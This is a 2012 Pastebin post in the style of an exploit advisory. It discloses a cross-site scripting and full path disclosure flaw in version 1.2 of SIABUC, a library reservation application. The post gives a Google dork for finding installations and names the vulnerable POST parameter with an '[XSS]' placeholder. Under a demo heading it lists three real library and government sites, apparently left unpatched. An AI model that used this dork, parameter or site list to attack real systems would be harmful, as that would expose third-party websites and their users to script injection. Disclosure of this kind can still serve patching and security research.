Advertisement
MaztoR

XSS Siabuc

May 22nd, 2012
81
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.87 KB | None | 0 0
  1. # Exploit Title: XSS & Full Path Disclosure SIABUC
  2. # Date: 24/02/2012
  3. # Author: MaztoR
  4. # Vendor or Software Link: http://siabuc.ucol.mx/
  5. # Version: Version 1.2 [Other versions "NO TESTED"]
  6. # Category: webapps Library
  7. # Google dork: inurl:/Reservacion/index.php
  8. # Tested on: Linux
  9.  
  10. =====================================
  11. Exploit
  12. =====================================
  13.  
  14. POST:> txtbuscar=[XSS]&paso=2&opciones=0
  15.  
  16. =====================================
  17. DEMO
  18. =====================================
  19.  
  20. http://www.biblioteca.ucm.edu.co/Reservacion/index.php
  21. http://www.ideartes.edu.co:8090/reservacion/index.php
  22. http://biblioteca.mirex.gov.do/reservacion/index.php
  23.  
  24.  
  25. ----------------------------------
  26. Blog: maztor.blogspot.com
  27. Twitter: @Mazt0r
  28. ----------------------------------
  29.  
  30. Greetz: HielaSangre - Linuxfer - SunPlace - xDarkStonex - SeguridadBlanca
  31. ALL USERS #RE - DDLR
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement